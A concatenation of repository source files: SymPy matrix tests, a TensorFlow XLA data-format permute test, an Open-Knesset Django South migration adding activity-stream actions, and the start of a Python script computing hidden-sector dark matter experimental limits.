assert isinstance(MM + IM, ImmutableMatrix)
assert isinstance(IM + MM, ImmutableMatrix)
assert isinstance(2*IM + MM, ImmutableMatrix)
assert MM.equals(IM)
def test_ME_MM():
assert isinstance(Identity(3) + MM, MatrixExpr)
assert isinstance(SM + MM, MatAdd)
assert isinstance(MM + SM, MatAdd)
assert (Identity(3) + MM)[1, 1] == 6
def test_equality():
a, b, c = Identity(3), eye(3), ImmutableMatrix(eye(3))
for x in [a, b, c]:
for y in [a, b, c]:
assert x.equals(y)
def test_matrix_symbol_MM():
X = MatrixSymbol('X', 3, 3)
Y = eye(3) + X
assert Y[1, 1] == 1 + X[1, 1]
def test_indexing_interactions():
assert (a * IM)[1, 1] == 5*a
assert (SM + IM)[1, 1] == SM[1, 1] + IM[1, 1]
assert (SM * IM)[1, 1] == SM[1, 0]*IM[0, 1] + SM[1, 1]*IM[1, 1] + \
SM[1, 2]*IM[2, 1]
def test_classof():
A = Matrix(3, 3, range(9))
B = ImmutableMatrix(3, 3, range(9))
C = MatrixSymbol('C', 3, 3)
assert classof(A, A) == Matrix
assert classof(B, B) == ImmutableMatrix
assert classof(A, B) == ImmutableMatrix
assert classof(B, A) == ImmutableMatrix
raises(TypeError, lambda: classof(A, C))
| bsd-3-clause | -973,157,637,153,099,300 | 27.074627 | 71 | 0.621478 | false |
hehongliang/tensorflow | tensorflow/compiler/tests/permute_test.py | 16 | 3387 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the DataFormatVecPermute operator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.compiler.tests import xla_test
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.platform import test
class XlaPermuteOpTest(xla_test.XLATestCase):
def _runPermuteAndCompare(self, x, src_format, dst_format, expected):
with self.cached_session() as session:
with self.test_scope():
placeholder = array_ops.placeholder(dtypes.as_dtype(x.dtype), x.shape)
param = {placeholder: x}
output = nn_ops.data_format_vec_permute(
placeholder, src_format=src_format, dst_format=dst_format)
result = session.run(output, param)
self.assertAllEqual(result, expected)
def testNHWCToNCHW(self):
for dtype in {np.int32, np.int64}:
x = np.array([7, 4, 9, 3], dtype=dtype)
self._runPermuteAndCompare(x, "NHWC", "NCHW", [7, 3, 4, 9])
def testNCHWToNHWC(self):
for dtype in {np.int32, np.int64}:
x = np.array([7, 4, 9, 3], dtype=dtype)
self._runPermuteAndCompare(x, "NCHW", "NHWC", [7, 9, 3, 4])
def testNHWCToHWNC(self):
for dtype in {np.int32, np.int64}:
x = np.array([7, 4, 9, 3], dtype=dtype)
self._runPermuteAndCompare(x, "NHWC", "HWNC", [4, 9, 7, 3])
def testHWNCToNHWC(self):
for dtype in {np.int32, np.int64}:
x = np.array([7, 4, 9, 3], dtype=dtype)
self._runPermuteAndCompare(x, "HWNC", "NHWC", [9, 7, 4, 3])
def testNHWCToNCHW2D(self):
for dtype in {np.int32, np.int64}:
x = np.array([[7, 4], [9, 3], [4, 5], [5, 1]], dtype=dtype)
self._runPermuteAndCompare(x, "NHWC", "NCHW",
[[7, 4], [5, 1], [9, 3], [4, 5]])
def testNHWCToHWNC2D(self):
for dtype in {np.int32, np.int64}:
x = np.array([[7, 4], [9, 3], [4, 5], [5, 1]], dtype=dtype)
self._runPermuteAndCompare(x, "NHWC", "HWNC",
[[9, 3], [4, 5], [7, 4], [5, 1]])
def testHWNCToNHWC2D(self):
for dtype in {np.int32, np.int64}:
x = np.array([[7, 4], [9, 3], [4, 5], [5, 1]], dtype=dtype)
self._runPermuteAndCompare(x, "HWNC", "NHWC",
[[4, 5], [7, 4], [9, 3], [5, 1]])
def testNCHWToNHWC2D(self):
for dtype in {np.int32, np.int64}:
x = np.array([[7, 4], [9, 3], [4, 5], [5, 1]], dtype=dtype)
self._runPermuteAndCompare(x, "NCHW", "NHWC",
[[7, 4], [4, 5], [5, 1], [9, 3]])
if __name__ == "__main__":
test.main()
| apache-2.0 | 8,228,656,646,681,334,000 | 37.488636 | 80 | 0.599941 | false |
Shrulik/Open-Knesset | mks/migrations/0009_add_action_stream.py | 10 | 28666 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def _get_FIELD_display(self, field):
value = getattr(self, field.attname)
return force_unicode(dict(field.flatchoices).get(value, value), strings_only=True)
depends_on = (
('committees', '0001_startapp_committees'),
('laws', '0001_initial'),
)
def forwards(self, orm):
from actstream import action
print 'addding committee actions'
for c in orm['committees.CommitteeMeeting'].objects.all():
for m in c.mks_attended.all():
action.send(m, verb='attended', target=c,
description='committee meeting', timestamp=c.date)
print 'addding posts actions'
for f in orm['planet.Feed'].objects.all():
member = orm.Member.objects.get(pk=orm['links.Link'].objects.get(url=f.url).object_pk)
for p in f.post_set.all():
action.send(member, verb='posted', target=p, timestamp=p.date_modified or p.date_created)
print 'adding votes actions (may take a while)'
from laws.models import VOTE_ACTION_TYPE_CHOICES
choice_dict = dict(VOTE_ACTION_TYPE_CHOICES)
for instance in orm['laws.VoteAction'].objects.all():
action.send(instance.member, verb='voted',
description=unicode(choice_dict[instance.type]),
target=instance.vote,
timestamp=instance.vote.time)
def backwards(self, orm):
"Write your backwards methods here."
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'committees.committee': {
'Meta': {'object_name': 'Committee'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'committees'", 'symmetrical': 'False', 'to': "orm['mks.Member']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'committees.committeemeeting': {
'Meta': {'object_name': 'CommitteeMeeting'},
'committee': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['committees.Committee']"}),
'date': ('django.db.models.fields.DateField', [], {}),
'date_string': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mks_attended': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'committee_meetings'", 'symmetrical': 'False', 'to': "orm['mks.Member']"}),
'protocol_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'topics': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'votes_mentioned': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'committee_meetings'", 'blank': 'True', 'to': "orm['laws.Vote']"})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'laws.knessetproposal': {
'Meta': {'object_name': 'KnessetProposal'},
'booklet_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'committee': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'bills'", 'null': 'True', 'to': "orm['committees.Committee']"}),
'committee_meetings': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'laws_knessetproposal_related'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['committees.CommitteeMeeting']"}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'knesset_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'law': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'laws_knessetproposal_related'", 'null': 'True', 'to': "orm['laws.Law']"}),
'originals': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'knesset_proposals'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['laws.PrivateProposal']"}),
'source_url': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'votes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'laws_knessetproposal_related'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['laws.Vote']"})
},
'laws.law': {
'Meta': {'object_name': 'Law'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1000'})
},
'laws.membervotingstatistics': {
'Meta': {'object_name': 'MemberVotingStatistics'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'member': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'voting_statistics'", 'unique': 'True', 'to': "orm['mks.Member']"})
},
'laws.partyvotingstatistics': {
'Meta': {'object_name': 'PartyVotingStatistics'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'party': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'voting_statistics'", 'unique': 'True', 'to': "orm['mks.Party']"})
},
'laws.privateproposal': {
'Meta': {'object_name': 'PrivateProposal'},
'committee_meetings': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'laws_privateproposal_related'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['committees.CommitteeMeeting']"}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'joiners': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'bills_joined'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['mks.Member']"}),
'knesset_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'law': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'laws_privateproposal_related'", 'null': 'True', 'to': "orm['laws.Law']"}),
'proposal_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'proposers': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'bills'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['mks.Member']"}),
'source_url': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'votes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'laws_privateproposal_related'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['laws.Vote']"})
},
'laws.vote': {
'Meta': {'object_name': 'Vote'},
'against_party': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'controversy': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'full_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'full_text_url': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'importance': ('django.db.models.fields.FloatField', [], {}),
'meeting_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'src_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'src_url': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'summary': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'time': ('django.db.models.fields.DateTimeField', [], {}),
'time_string': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'vote_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'votes': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'votes'", 'blank': 'True', 'through': "orm['laws.VoteAction']", 'to': "orm['mks.Member']"}),
'votes_count': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
'laws.voteaction': {
'Meta': {'object_name': 'VoteAction'},
'against_coalition': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'against_opposition': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'against_party': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'member': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mks.Member']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'vote': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['laws.Vote']"})
},
'links.link': {
'Meta': {'object_name': 'Link'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'content_type_set_for_link'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['links.LinkType']", 'null': 'True', 'blank': 'True'}),
'object_pk': ('django.db.models.fields.TextField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'links.linktype': {
'Meta': {'object_name': 'LinkType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'mks.correlation': {
'Meta': {'object_name': 'Correlation'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'm1': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'m1'", 'to': "orm['mks.Member']"}),
'm2': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'m2'", 'to': "orm['mks.Member']"}),
'normalized_score': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'not_same_party': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'mks.member': {
'Meta': {'object_name': 'Member'},
'area_of_residence': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'blog': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['planet.Blog']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'current_party': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'members'", 'null': 'True', 'to': "orm['mks.Party']"}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_of_death': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'family_status': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'fax': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'img_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'is_current': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'number_of_children': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'parties': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'all_members'", 'symmetrical': 'False', 'through': "orm['mks.Membership']", 'to': "orm['mks.Party']"}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'}),
'place_of_birth': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'place_of_residence': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'year_of_aliyah': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
'mks.membership': {
'Meta': {'object_name': 'Membership'},
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'member': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mks.Member']"}),
'party': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mks.Party']"}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
},
'mks.party': {
'Meta': {'object_name': 'Party'},
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_coalition': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'number_of_members': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'number_of_seats': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
},
'mks.weeklypresence': {
'Meta': {'object_name': 'WeeklyPresence'},
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'hours': ('django.db.models.fields.FloatField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'member': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mks.Member']"})
},
'planet.author': {
'Meta': {'object_name': 'Author'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'profile_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
'planet.blog': {
'Meta': {'object_name': 'Blog'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'unique': 'True', 'max_length': '200', 'db_index': 'True'})
},
'planet.enclosure': {
'Meta': {'object_name': 'Enclosure'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'length': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '500', 'db_index': 'True'}),
'mime_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'post': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['planet.Post']"})
},
'planet.feed': {
'Meta': {'object_name': 'Feed'},
'blog': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['planet.Blog']", 'null': 'True', 'blank': 'True'}),
'etag': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '50', 'null': 'True', 'blank': 'True'}),
'generator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['planet.Generator']", 'null': 'True', 'blank': 'True'}),
'guid': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'icon_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'info': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True', 'blank': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'last_checked': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'last_modified': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'rights': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'subtitle': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'unique': 'True', 'max_length': '200', 'db_index': 'True'})
},
'planet.feedlink': {
'Meta': {'object_name': 'FeedLink'},
'feed': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['planet.Feed']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '500', 'db_index': 'True'}),
'mime_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'rel': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
'planet.generator': {
'Meta': {'unique_together': "(('name', 'link', 'version'),)", 'object_name': 'Generator'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '5', 'null': 'True', 'blank': 'True'})
},
'planet.post': {
'Meta': {'unique_together': "(('feed', 'guid'),)", 'object_name': 'Post'},
'authors': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['planet.Author']", 'through': "orm['planet.PostAuthorData']", 'symmetrical': 'False'}),
'comments_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {}),
'date_created': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_modified': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'feed': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['planet.Feed']"}),
'guid': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'db_index': 'True'})
},
'planet.postauthordata': {
'Meta': {'object_name': 'PostAuthorData'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['planet.Author']"}),
'date_created': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_contributor': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'post': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['planet.Post']"})
},
'planet.postlink': {
'Meta': {'object_name': 'PostLink'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '500', 'db_index': 'True'}),
'mime_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'post': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['planet.Post']"}),
'rel': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'})
},
'sites.site': {
'Meta': {'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'tagging.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
},
'tagging.taggeditem': {
'Meta': {'unique_together': "(('tag', 'content_type', 'object_id'),)", 'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': "orm['tagging.Tag']"})
}
}
complete_apps = ['planet', 'committees', 'laws', 'links', 'mks']
| bsd-3-clause | -8,502,535,806,786,915,000 | 79.522472 | 243 | 0.542106 | false |
pgdeniverville/Hidden-Sector-Limits | Hidden_Sector_Limits.py | 1 | 8466 | #!/usr/bin/env python
from Hidden_Sec_Utilities import *
from Hidden_Sec_Physics import *
import itertools
"""
I use kappa and epsilon interchangeably. They mean the same thing.
Many of these limits are not valid in the off-shell regime, or
change dramatically. Use at your own risk!
"""
#Default value of alpha_p to use
_alpha_p_set = 0.5
#Takes an array of masses mass_arr and generates some experimental limits for kinetically mixed hidden sector dark matter. These limits are written to text files.
#func can be any function that accepts arguments in the form (mv,mx,alpha_p,kappa).
def table_of_limits(mass_arr,alpha_p=_alpha_p_set,run_name="",fill_val=1000,func=Y_func):
mass_arr = np.array(mass_arr)
#Relic Density, using the fast option.
print("Run Relic_Density.py to generate relic density line")
#relic_tab=[func(mv,mx,alpha_p,gen_relic_dm_fast(mv,mx,alpha_p)) for mv,mx in mass_arr]
#Best limits of muon and electron g-2
print("Generating g-2 epsilon limits")
g_minus_2_tab = [func(mv,mx,alpha_p,min(kappa_muon_lim(mv),kappa_electron_lim(mv))) for mv,mx in mass_arr]
g_minus_2_electron = [func(mv,mx,alpha_p,kappa_electron_lim(mv)) for mv,mx in mass_arr]
g_minus_2_muon = [func(mv,mx,alpha_p,kappa_muon_lim(mv)) for mv,mx in mass_arr]
print("Generating g-2 epsilon favoured region")
g_muon_fav_low_tab = [func(mv,mx,alpha_p,kappa_fav_low(mv)) for mv,mx in mass_arr]
g_muon_fav_high_tab = [func(mv,mx,alpha_p,kappa_fav_high(mv)) for mv,mx in mass_arr]
print("Generating BaBar limits")
babar_tab=[func(mv,mx,alpha_p,babar_func(mv,mx,alpha_p,fill_value=fill_val)) for mv,mx in mass_arr]
print("Generating BaBar 2017 limits")
babar2017_tab=[func(mv,mx,alpha_p,babar_func2017(mv,mx,alpha_p,fill_value=fill_val)) for mv,mx in mass_arr]
print("Generating limits from rare decays (J\Psi->V)")
rare_tab = [func(mv,mx,alpha_p,rarelimit(mv,mx,alpha_p)) for mv,mx in mass_arr]
print("Generating Monojet limits")
monojet_tab = [func(mv,mx,alpha_p,monojet_limit()) for mv,mx in mass_arr]
print("Generating rare kaon decay limits (K->pi+V)")
